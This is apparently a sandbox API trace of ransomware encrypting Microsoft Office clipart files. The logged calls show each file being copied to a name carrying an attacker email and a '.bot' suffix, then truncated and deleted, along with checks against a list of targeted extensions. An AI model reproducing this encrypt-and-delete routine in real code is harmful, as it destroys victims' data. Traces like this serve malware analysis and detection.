	[0148.641] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01461_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01461_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0148.641] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=5958) returned 1
	[0148.641] CloseHandle (hObject=0x3a0) returned 1
	[0148.641] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01461_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01461_.wmf")) returned 0x20
	[0148.641] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01461_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01461_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0148.642] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01461_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01461_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0148.642] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.642] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.642] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01461_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01461_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc
	[0148.643] GetLastError () returned 0x0
	[0148.643] ReadFile (in: hFile=0x3a0, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x1746, lpOverlapped=0x0) returned 1
	[0148.644] WriteFile (in: hFile=0x3dc, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x1750, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x1750, lpOverlapped=0x0) returned 1
	[0148.645] ReadFile (in: hFile=0x3a0, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0148.645] WriteFile (in: hFile=0x3dc, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0148.646] SetEndOfFile (hFile=0x3dc) returned 1
	[0148.646] CloseHandle (hObject=0x3dc) returned 1
	[0148.646] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.646] SetEndOfFile (hFile=0x3a0) returned 1
	[0148.648] CloseHandle (hObject=0x3a0) returned 1
	[0148.648] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01461_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0148.648] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01461_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01461_.wmf")) returned 1
	[0148.649] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01461_.WMF") returned 63
	[0148.649] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01461_.WMF") returned 63
	[0148.649] lstrlenW (lpString=".doc") returned 4
	[0148.649] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0148.649] lstrlenW (lpString=".docx") returned 5
	[0148.649] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0148.649] lstrlenW (lpString=".pdf") returned 4
	[0148.649] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0148.649] lstrlenW (lpString=".xls") returned 4
	[0148.649] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0148.649] lstrlenW (lpString=".xlsx") returned 5
	[0148.649] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0148.649] lstrlenW (lpString=".ppt") returned 4
	[0148.649] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0148.649] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01461_.WMF") returned 63
	[0148.649] lstrlenW (lpString=".zip") returned 4
	[0148.649] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0148.649] lstrlenW (lpString=".rar") returned 4
	[0148.649] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0148.650] lstrlenW (lpString=".bz2") returned 4
	[0148.650] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0148.650] lstrlenW (lpString=".7z") returned 3
	[0148.650] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0148.650] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01461_.WMF") returned 63
	[0148.650] lstrlenW (lpString=".dbf") returned 4
	[0148.650] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0148.650] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01461_.WMF") returned 63
	[0148.650] lstrlenW (lpString=".1cd") returned 4
	[0148.650] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0148.650] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01461_.WMF") returned 63
	[0148.650] lstrlenW (lpString=".jpg") returned 4
	[0148.650] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0148.650] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01461_.WMF") returned 63
	[0148.650] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01461_.WMF") returned 63
	[0148.650] lstrlenW (lpString=".doc") returned 4
	[0148.650] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0148.650] lstrlenW (lpString=".docx") returned 5
	[0148.650] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0148.650] lstrlenW (lpString=".pdf") returned 4
	[0148.650] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0148.650] lstrlenW (lpString=".xls") returned 4
	[0148.650] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0148.650] lstrlenW (lpString=".xlsx") returned 5
	[0148.650] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0148.650] lstrlenW (lpString=".ppt") returned 4
	[0148.650] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0148.650] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01461_.WMF") returned 63
	[0148.650] lstrlenW (lpString=".zip") returned 4
	[0148.651] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0148.651] lstrlenW (lpString=".rar") returned 4
	[0148.651] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0148.651] lstrlenW (lpString=".bz2") returned 4
	[0148.651] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0148.651] lstrlenW (lpString=".7z") returned 3
	[0148.651] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0148.651] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01461_.WMF") returned 63
	[0148.651] lstrlenW (lpString=".dbf") returned 4
	[0148.651] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0148.651] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01461_.WMF") returned 63
	[0148.651] lstrlenW (lpString=".1cd") returned 4
	[0148.651] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0148.651] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01461_.WMF") returned 63
	[0148.651] lstrlenW (lpString=".jpg") returned 4
	[0148.651] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0148.651] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0148.651] lstrlenW (lpString="HH01618_.WMF") returned 12
	[0148.651] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01618_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01618_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0148.652] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=7296) returned 1
	[0148.652] CloseHandle (hObject=0x3a0) returned 1
	[0148.652] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01618_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01618_.wmf")) returned 0x20
	[0148.652] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01618_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01618_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0148.652] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01618_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01618_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0148.652] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.652] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.652] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01618_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01618_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc
	[0148.653] GetLastError () returned 0x0
	[0148.653] ReadFile (in: hFile=0x3a0, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x1c80, lpOverlapped=0x0) returned 1
	[0148.902] WriteFile (in: hFile=0x3dc, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x1c90, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x1c90, lpOverlapped=0x0) returned 1
	[0149.032] ReadFile (in: hFile=0x3a0, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0149.032] WriteFile (in: hFile=0x3dc, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0149.032] SetEndOfFile (hFile=0x3dc) returned 1
	[0149.034] CloseHandle (hObject=0x3dc) returned 1
	[0149.034] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.034] SetEndOfFile (hFile=0x3a0) returned 1
	[0149.038] CloseHandle (hObject=0x3a0) returned 1
	[0149.038] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01618_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0149.050] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01618_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01618_.wmf")) returned 1
	[0149.054] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01618_.WMF") returned 63
	[0149.054] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01618_.WMF") returned 63
	[0149.054] lstrlenW (lpString=".doc") returned 4
	[0149.054] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0149.054] lstrlenW (lpString=".docx") returned 5
	[0149.054] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0149.054] lstrlenW (lpString=".pdf") returned 4
	[0149.054] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0149.055] lstrlenW (lpString=".xls") returned 4
	[0149.055] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0149.055] lstrlenW (lpString=".xlsx") returned 5
	[0149.055] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0149.055] lstrlenW (lpString=".ppt") returned 4
	[0149.055] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0149.055] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01618_.WMF") returned 63
	[0149.055] lstrlenW (lpString=".zip") returned 4
	[0149.055] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0149.055] lstrlenW (lpString=".rar") returned 4
	[0149.055] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0149.055] lstrlenW (lpString=".bz2") returned 4
	[0149.055] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0149.055] lstrlenW (lpString=".7z") returned 3
	[0149.055] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0149.055] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01618_.WMF") returned 63
	[0149.055] lstrlenW (lpString=".dbf") returned 4
	[0149.055] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0149.055] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01618_.WMF") returned 63
	[0149.055] lstrlenW (lpString=".1cd") returned 4
	[0149.055] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0149.055] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01618_.WMF") returned 63
	[0149.055] lstrlenW (lpString=".jpg") returned 4
	[0149.055] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0149.055] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01618_.WMF") returned 63
	[0149.055] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01618_.WMF") returned 63
	[0149.055] lstrlenW (lpString=".doc") returned 4
	[0149.055] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0149.055] lstrlenW (lpString=".docx") returned 5
	[0149.055] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0149.056] lstrlenW (lpString=".pdf") returned 4
	[0149.056] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0149.056] lstrlenW (lpString=".xls") returned 4
	[0149.056] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0149.056] lstrlenW (lpString=".xlsx") returned 5
	[0149.056] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0149.056] lstrlenW (lpString=".ppt") returned 4
	[0149.056] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0149.056] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01618_.WMF") returned 63
	[0149.056] lstrlenW (lpString=".zip") returned 4
	[0149.056] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0149.056] lstrlenW (lpString=".rar") returned 4
	[0149.056] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0149.056] lstrlenW (lpString=".bz2") returned 4
	[0149.056] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0149.056] lstrlenW (lpString=".7z") returned 3
	[0149.056] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0149.056] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01618_.WMF") returned 63
	[0149.056] lstrlenW (lpString=".dbf") returned 4
	[0149.056] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0149.056] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01618_.WMF") returned 63
	[0149.056] lstrlenW (lpString=".1cd") returned 4
	[0149.056] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0149.056] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01618_.WMF") returned 63
	[0149.056] lstrlenW (lpString=".jpg") returned 4
	[0149.056] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0149.056] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0149.057] lstrlenW (lpString="HH02282_.WMF") returned 12
	[0149.057] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02282_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02282_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0149.057] GetFileSizeEx (in: hFile=0x3e8, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=7932) returned 1
	[0149.057] CloseHandle (hObject=0x3e8) returned 1
	[0149.057] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02282_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02282_.wmf")) returned 0x20
	[0149.057] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02282_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02282_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0149.057] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02282_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02282_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0149.058] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.058] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.058] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02282_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02282_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec
	[0149.058] GetLastError () returned 0x0
	[0149.058] ReadFile (in: hFile=0x3e8, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x1efc, lpOverlapped=0x0) returned 1
	[0149.063] WriteFile (in: hFile=0x3ec, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x1f00, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x1f00, lpOverlapped=0x0) returned 1
	[0149.064] ReadFile (in: hFile=0x3e8, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0149.064] WriteFile (in: hFile=0x3ec, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0149.064] SetEndOfFile (hFile=0x3ec) returned 1
	[0149.064] CloseHandle (hObject=0x3ec) returned 1
	[0149.064] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.064] SetEndOfFile (hFile=0x3e8) returned 1
	[0149.068] CloseHandle (hObject=0x3e8) returned 1
	[0149.068] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02282_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0149.068] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02282_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02282_.wmf")) returned 1
	[0149.069] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02282_.WMF") returned 63
	[0149.069] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02282_.WMF") returned 63
	[0149.069] lstrlenW (lpString=".doc") returned 4
	[0149.069] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0149.069] lstrlenW (lpString=".docx") returned 5
	[0149.069] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0149.069] lstrlenW (lpString=".pdf") returned 4
	[0149.069] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0149.069] lstrlenW (lpString=".xls") returned 4
	[0149.069] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0149.069] lstrlenW (lpString=".xlsx") returned 5
	[0149.069] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0149.069] lstrlenW (lpString=".ppt") returned 4
	[0149.069] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0149.069] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02282_.WMF") returned 63
	[0149.069] lstrlenW (lpString=".zip") returned 4
	[0149.069] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0149.069] lstrlenW (lpString=".rar") returned 4
	[0149.069] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0149.069] lstrlenW (lpString=".bz2") returned 4
	[0149.069] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0149.069] lstrlenW (lpString=".7z") returned 3
	[0149.069] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0149.069] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02282_.WMF") returned 63
	[0149.069] lstrlenW (lpString=".dbf") returned 4
	[0149.070] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0149.070] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02282_.WMF") returned 63
	[0149.070] lstrlenW (lpString=".1cd") returned 4
	[0149.070] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0149.070] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02282_.WMF") returned 63
	[0149.070] lstrlenW (lpString=".jpg") returned 4
	[0149.070] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0149.070] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02282_.WMF") returned 63
	[0149.070] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02282_.WMF") returned 63
	[0149.070] lstrlenW (lpString=".doc") returned 4
	[0149.070] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0149.070] lstrlenW (lpString=".docx") returned 5
	[0149.070] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0149.070] lstrlenW (lpString=".pdf") returned 4
	[0149.070] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0149.070] lstrlenW (lpString=".xls") returned 4
	[0149.070] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0149.070] lstrlenW (lpString=".xlsx") returned 5
	[0149.070] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0149.070] lstrlenW (lpString=".ppt") returned 4
	[0149.070] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0149.070] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02282_.WMF") returned 63
	[0149.070] lstrlenW (lpString=".zip") returned 4
	[0149.070] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0149.070] lstrlenW (lpString=".rar") returned 4
	[0149.070] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0149.070] lstrlenW (lpString=".bz2") returned 4
	[0149.070] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0149.070] lstrlenW (lpString=".7z") returned 3
	[0149.070] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0149.070] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02282_.WMF") returned 63
	[0149.070] lstrlenW (lpString=".dbf") returned 4
	[0149.071] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0149.071] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02282_.WMF") returned 63
	[0149.071] lstrlenW (lpString=".1cd") returned 4
	[0149.071] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0149.071] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02282_.WMF") returned 63
	[0149.071] lstrlenW (lpString=".jpg") returned 4
	[0149.071] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0149.071] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0149.071] lstrlenW (lpString="HH02298_.WMF") returned 12
